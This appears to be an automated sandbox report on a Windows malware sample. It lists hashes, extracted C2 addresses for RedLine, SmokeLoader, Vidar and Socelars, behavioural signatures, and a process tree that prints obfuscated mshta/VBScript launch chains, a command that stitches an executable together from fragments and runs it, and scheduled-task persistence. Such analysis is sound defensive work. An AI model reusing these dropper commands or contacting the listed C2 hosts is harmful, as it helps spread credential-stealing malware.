Analysis

  • max time kernel
    81s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    22/11/2021, 12:51

General

  • Target

    d9552a15a61f255df3206b63ee0383be.exe

  • Size

    554KB

  • MD5

    d9552a15a61f255df3206b63ee0383be

  • SHA1

    7c76e2edcf184b90d40003dac71b08e3a3ed2e8c

  • SHA256

    0cdd906491990c6ba9c24bdd60172057587859a8e649ba7f4b51fece9a0fdac6

  • SHA512

    0ce1db824d226df28177b6e5394fa1f8483333583d8332680d4cf0cfc8627a53d69c1c857b319dd200e0f38bf88d445a4289d78472fe3167cc39ae6a85f21599

Malware Config

Extracted

Family

socelars

C2

http://www.gianninidesign.com/

Extracted

Family

redline

C2

185.92.73.160:46771

Extracted

Family

redline

Botnet

13

C2

136.144.41.178:9295

Extracted

Family

redline

Botnet

TestBest1

C2

188.227.87.7:10234

Extracted

Family

smokeloader

Version

2020

C2

http://membro.at/upload/

http://jeevanpunetha.com/upload/

http://misipu.cn/upload/

http://zavodooo.ru/upload/

http://targiko.ru/upload/

http://vues3d.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

48.6

Botnet

937

C2

https://mastodon.online/@valhalla

https://koyu.space/@valhalla

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

udptest

C2

193.56.146.64:65441

Extracted

Family

redline

Botnet

Ruzki 3k

C2

185.244.181.71:2119

Extracted

Family

redline

Botnet

ignation

C2

37.9.13.169:63912

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 12 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Vidar Stealer 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 25 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d9552a15a61f255df3206b63ee0383be.exe
    "C:\Users\Admin\AppData\Local\Temp\d9552a15a61f255df3206b63ee0383be.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2468
    • C:\Users\Admin\Pictures\Adobe Films\gHpwhoCGxUWsmql8C5nAlwbs.exe
      "C:\Users\Admin\Pictures\Adobe Films\gHpwhoCGxUWsmql8C5nAlwbs.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:956
    • C:\Users\Admin\Pictures\Adobe Films\XNZwpkTvIAOD78FTHWKpQF_u.exe
      "C:\Users\Admin\Pictures\Adobe Films\XNZwpkTvIAOD78FTHWKpQF_u.exe"
      2⤵
      • Executes dropped EXE
      PID:680
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 400
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:708
    • C:\Users\Admin\Pictures\Adobe Films\_VjiwHbtuy37_JPzF6IcOdvI.exe
      "C:\Users\Admin\Pictures\Adobe Films\_VjiwHbtuy37_JPzF6IcOdvI.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:724
    • C:\Users\Admin\Pictures\Adobe Films\Ys9xONIZ2zMkfdltG8YIwyLI.exe
      "C:\Users\Admin\Pictures\Adobe Films\Ys9xONIZ2zMkfdltG8YIwyLI.exe"
      2⤵
      • Executes dropped EXE
      PID:1320
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 400
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:656
    • C:\Users\Admin\Pictures\Adobe Films\IIEJIZY_SZgssVHr8AKAwUN9.exe
      "C:\Users\Admin\Pictures\Adobe Films\IIEJIZY_SZgssVHr8AKAwUN9.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2592
    • C:\Users\Admin\Pictures\Adobe Films\VH7kbYzRqJXJ_EUcJHqV5bPa.exe
      "C:\Users\Admin\Pictures\Adobe Films\VH7kbYzRqJXJ_EUcJHqV5bPa.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1736
    • C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe
      "C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"
      2⤵
      • Executes dropped EXE
      PID:2880
      • C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe
        "C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"
        3⤵
          PID:1728
        • C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe
          "C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"
          3⤵
            PID:2272
          • C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe
            "C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"
            3⤵
              PID:3444
            • C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe
              "C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"
              3⤵
                PID:4180
            • C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe
              "C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe"
              2⤵
              • Executes dropped EXE
              PID:1440
              • C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe
                "C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe"
                3⤵
                  PID:3736
              • C:\Users\Admin\Pictures\Adobe Films\NJLZolJE37X_FqtXQ3EqKJkr.exe
                "C:\Users\Admin\Pictures\Adobe Films\NJLZolJE37X_FqtXQ3EqKJkr.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:3764
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im chrome.exe
                  3⤵
                    PID:4488
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      4⤵
                      • Kills process with taskkill
                      PID:5060
                • C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe
                  "C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:3704
                  • C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe
                    "C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:700
                • C:\Users\Admin\Pictures\Adobe Films\obEL72OIYFiysJSfwnbvSnkT.exe
                  "C:\Users\Admin\Pictures\Adobe Films\obEL72OIYFiysJSfwnbvSnkT.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:3300
                • C:\Users\Admin\Pictures\Adobe Films\O6FR10TQUM5bpSSUN_mhgVfA.exe
                  "C:\Users\Admin\Pictures\Adobe Films\O6FR10TQUM5bpSSUN_mhgVfA.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:1296
                  • C:\Users\Admin\Documents\4RQU_GVOsbXT3T7wBls4cB0K.exe
                    "C:\Users\Admin\Documents\4RQU_GVOsbXT3T7wBls4cB0K.exe"
                    3⤵
                      PID:1080
                      • C:\Users\Admin\Pictures\Adobe Films\V3GCH1dCM4JtyOdD1UWZ2_tC.exe
                        "C:\Users\Admin\Pictures\Adobe Films\V3GCH1dCM4JtyOdD1UWZ2_tC.exe"
                        4⤵
                          PID:4896
                        • C:\Users\Admin\Pictures\Adobe Films\8tmxLhzOeaMFxSozv75GAV3L.exe
                          "C:\Users\Admin\Pictures\Adobe Films\8tmxLhzOeaMFxSozv75GAV3L.exe"
                          4⤵
                            PID:4488
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 652
                              5⤵
                              • Program crash
                              PID:2772
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 664
                              5⤵
                              • Program crash
                              PID:5340
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 768
                              5⤵
                              • Program crash
                              PID:2452
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 804
                              5⤵
                              • Program crash
                              PID:6124
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 800
                              5⤵
                              • Program crash
                              PID:5420
                          • C:\Users\Admin\Pictures\Adobe Films\a5NwEe3wwV5amklomjrghoSt.exe
                            "C:\Users\Admin\Pictures\Adobe Films\a5NwEe3wwV5amklomjrghoSt.exe"
                            4⤵
                              PID:3600
                            • C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe
                              "C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe"
                              4⤵
                                PID:3164
                                • C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe" -u
                                  5⤵
                                    PID:5520
                                • C:\Users\Admin\Pictures\Adobe Films\VfAVvtPyxS7Gw3Zz73JPqETV.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\VfAVvtPyxS7Gw3Zz73JPqETV.exe"
                                  4⤵
                                    PID:5296
                                  • C:\Users\Admin\Pictures\Adobe Films\x1zrysQfONa2jaIoWwX6oB6d.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\x1zrysQfONa2jaIoWwX6oB6d.exe"
                                    4⤵
                                      PID:3164
                                      • C:\Users\Admin\AppData\Local\Temp\is-NCSP8.tmp\x1zrysQfONa2jaIoWwX6oB6d.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-NCSP8.tmp\x1zrysQfONa2jaIoWwX6oB6d.tmp" /SL5="$3030E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\x1zrysQfONa2jaIoWwX6oB6d.exe"
                                        5⤵
                                          PID:5620
                                          • C:\Users\Admin\AppData\Local\Temp\is-VBKB9.tmp\lakazet.exe
                                            "C:\Users\Admin\AppData\Local\Temp\is-VBKB9.tmp\lakazet.exe" /S /UID=2709
                                            6⤵
                                              PID:5292
                                              • C:\Users\Admin\AppData\Local\Temp\59-5b5fe-bb3-a5b88-7716379af7b28\Nogaguhyka.exe
                                                "C:\Users\Admin\AppData\Local\Temp\59-5b5fe-bb3-a5b88-7716379af7b28\Nogaguhyka.exe"
                                                7⤵
                                                  PID:4884
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe /eufive & exit
                                                    8⤵
                                                      PID:7244
                                                      • C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe
                                                        C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe /eufive
                                                        9⤵
                                                          PID:7384
                                                          • C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe
                                                            C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe /eufive
                                                            10⤵
                                                              PID:7436
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe /silent /subid=798 & exit
                                                          8⤵
                                                            PID:6064
                                                            • C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe
                                                              C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe /silent /subid=798
                                                              9⤵
                                                                PID:3816
                                                                • C:\Users\Admin\AppData\Local\Temp\is-8GNNV.tmp\vpn.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-8GNNV.tmp\vpn.tmp" /SL5="$10398,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe" /silent /subid=798
                                                                  10⤵
                                                                    PID:6168
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                      11⤵
                                                                        PID:3684
                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                          tapinstall.exe remove tap0901
                                                                          12⤵
                                                                            PID:6252
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lyrm0uek.ynv\installer.exe /qn CAMPAIGN="654" & exit
                                                                    8⤵
                                                                      PID:2196
                                                                      • C:\Users\Admin\AppData\Local\Temp\lyrm0uek.ynv\installer.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\lyrm0uek.ynv\installer.exe /qn CAMPAIGN="654"
                                                                        9⤵
                                                                          PID:6412
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe & exit
                                                                        8⤵
                                                                          PID:6324
                                                                          • C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe
                                                                            9⤵
                                                                              PID:4656
                                                                              • C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe" -u
                                                                                10⤵
                                                                                  PID:8036
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5yiqskcd.eum\rtst1045.exe & exit
                                                                              8⤵
                                                                                PID:7580
                                                                                • C:\Users\Admin\AppData\Local\Temp\5yiqskcd.eum\rtst1045.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\5yiqskcd.eum\rtst1045.exe
                                                                                  9⤵
                                                                                    PID:4784
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe /mixfive & exit
                                                                                  8⤵
                                                                                    PID:4284
                                                                                    • C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe /mixfive
                                                                                      9⤵
                                                                                        PID:7112
                                                                                        • C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe /mixfive
                                                                                          10⤵
                                                                                            PID:5292
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tjixuxef.vv4\autosubplayer.exe /S & exit
                                                                                        8⤵
                                                                                          PID:6220
                                                                                          • C:\Users\Admin\AppData\Local\Temp\tjixuxef.vv4\autosubplayer.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\tjixuxef.vv4\autosubplayer.exe /S
                                                                                            9⤵
                                                                                              PID:3328
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9FC3.tmp\tempfile.ps1"
                                                                                                10⤵
                                                                                                  PID:7092
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zfd4m0cb.bl0\installer.exe /qn CAMPAIGN=654 & exit
                                                                                              8⤵
                                                                                                PID:7588
                                                                                                • C:\Users\Admin\AppData\Local\Temp\zfd4m0cb.bl0\installer.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\zfd4m0cb.bl0\installer.exe /qn CAMPAIGN=654
                                                                                                  9⤵
                                                                                                    PID:7920
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\yHUOwrYtcItGUXoLYS8taBHy.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\yHUOwrYtcItGUXoLYS8taBHy.exe"
                                                                                          4⤵
                                                                                            PID:5672
                                                                                            • C:\Users\Admin\AppData\Roaming\Traffic\setup.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Traffic\setup.exe -cid= -sid= -silent=1
                                                                                              5⤵
                                                                                                PID:7460
                                                                                                • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" "--KGyYl1v"
                                                                                                  6⤵
                                                                                                    PID:7848
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:1728
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:4024
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\WVrSv9ymnNaFCHZ1OhI4PXZh.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\WVrSv9ymnNaFCHZ1OhI4PXZh.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks SCSI registry key(s)
                                                                                            PID:1280
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\mXxK5JogboFNja5c52jC2vWc.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\mXxK5JogboFNja5c52jC2vWc.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1740
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 660
                                                                                              3⤵
                                                                                              • Program crash
                                                                                              PID:4612
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 676
                                                                                              3⤵
                                                                                              • Program crash
                                                                                              PID:4936
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 680
                                                                                              3⤵
                                                                                              • Program crash
                                                                                              PID:5100
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 692
                                                                                              3⤵
                                                                                              • Program crash
                                                                                              PID:4172
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 752
                                                                                              3⤵
                                                                                              • Program crash
                                                                                              PID:3612
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\NDd0Pa2E0Rb0cZgDOhr9UELU.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\NDd0Pa2E0Rb0cZgDOhr9UELU.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2052
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im NDd0Pa2E0Rb0cZgDOhr9UELU.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\NDd0Pa2E0Rb0cZgDOhr9UELU.exe" & del C:\ProgramData\*.dll & exit
                                                                                              3⤵
                                                                                                PID:2208
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /im NDd0Pa2E0Rb0cZgDOhr9UELU.exe /f
                                                                                                  4⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:4060
                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                  timeout /t 6
                                                                                                  4⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:3064
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\mnFuOqYf8WL71_aC7nZIaRZs.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\mnFuOqYf8WL71_aC7nZIaRZs.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in Program Files directory
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2340
                                                                                              • C:\Program Files (x86)\Company\NewProduct\rtst1039.exe
                                                                                                "C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3508
                                                                                              • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                                                                                                "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3388
                                                                                              • C:\Program Files (x86)\Company\NewProduct\inst2.exe
                                                                                                "C:\Program Files (x86)\Company\NewProduct\inst2.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3108
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\SxsxiDh19G4M6ZMjAAn63qOK.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\SxsxiDh19G4M6ZMjAAn63qOK.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2888
                                                                                              • C:\Users\Admin\AppData\Roaming\2045521.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\2045521.exe"
                                                                                                3⤵
                                                                                                  PID:4048
                                                                                                • C:\Users\Admin\AppData\Roaming\7310357.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\7310357.exe"
                                                                                                  3⤵
                                                                                                    PID:1520
                                                                                                    • C:\Users\Admin\AppData\Roaming\3889124\38881633888163.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\3889124\38881633888163.exe"
                                                                                                      4⤵
                                                                                                        PID:4716
                                                                                                    • C:\Users\Admin\AppData\Roaming\4682617.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\4682617.exe"
                                                                                                      3⤵
                                                                                                        PID:4216
                                                                                                      • C:\Users\Admin\AppData\Roaming\4183110.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\4183110.exe"
                                                                                                        3⤵
                                                                                                          PID:4376
                                                                                                        • C:\Users\Admin\AppData\Roaming\4340187.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\4340187.exe"
                                                                                                          3⤵
                                                                                                            PID:4428
                                                                                                            • C:\Users\Admin\AppData\Roaming\8115156.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\8115156.exe"
                                                                                                              4⤵
                                                                                                                PID:3168
                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                  "C:\Windows\System32\mshta.exe" VBscRIpt: clOSe ( cReAteOBJecT ( "WSCRIpT.shELl"). rUN ( "CmD.EXe /Q /c CoPy /Y ""C:\Users\Admin\AppData\Roaming\8115156.exe"" 96I39AZEjeY.eXe && sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If """" == """" for %J IN ( ""C:\Users\Admin\AppData\Roaming\8115156.exe"" ) do taskkill /f /iM ""%~nxJ"" " , 0 ,tRUe ) )
                                                                                                                  5⤵
                                                                                                                    PID:4784
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /c CoPy /Y "C:\Users\Admin\AppData\Roaming\8115156.exe" 96I39AZEjeY.eXe &&sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If "" == "" for %J IN ( "C:\Users\Admin\AppData\Roaming\8115156.exe" ) do taskkill /f /iM "%~nxJ"
                                                                                                                      6⤵
                                                                                                                        PID:5056
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe
                                                                                                                          96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8
                                                                                                                          7⤵
                                                                                                                            PID:4172
                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                              "C:\Windows\System32\mshta.exe" VBscRIpt: clOSe ( cReAteOBJecT ( "WSCRIpT.shELl"). rUN ( "CmD.EXe /Q /c CoPy /Y ""C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe"" 96I39AZEjeY.eXe && sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If ""/pHUW_5J4~bwUgHE59AL0C8 "" == """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe"" ) do taskkill /f /iM ""%~nxJ"" " , 0 ,tRUe ) )
                                                                                                                              8⤵
                                                                                                                                PID:5228
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q /c CoPy /Y "C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe" 96I39AZEjeY.eXe &&sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If "/pHUW_5J4~bwUgHE59AL0C8 " == "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe" ) do taskkill /f /iM "%~nxJ"
                                                                                                                                  9⤵
                                                                                                                                    PID:5448
                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                  "C:\Windows\System32\mshta.exe" VbSCRiPt: ClOSE ( CreATEobJeCt ( "WScRipT.sHELL" ). run ( "CMD /Q /C ECHo | Set /P = ""MZ"" > sGRrCYU.nK0& CoPY /Y /b SGRrCYU.nK0 + 8IocY82.AK + QsN7PDR.gG + 4BRi.S xW5LDH.~rl & dEL 8IocY82.AK qSN7PdR.gg 4BRi.s sGRrCYU.nK0&sTart msiexec -Y .\Xw5LDH.~Rl " ,0 , tRUE ) )
                                                                                                                                  8⤵
                                                                                                                                    PID:5304
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /C ECHo | Set /P = "MZ" > sGRrCYU.nK0& CoPY /Y /b SGRrCYU.nK0 + 8IocY82.AK + QsN7PDR.gG + 4BRi.S xW5LDH.~rl & dEL 8IocY82.AK qSN7PdR.gg 4BRi.s sGRrCYU.nK0&sTart msiexec -Y .\Xw5LDH.~Rl
                                                                                                                                      9⤵
                                                                                                                                        PID:5496
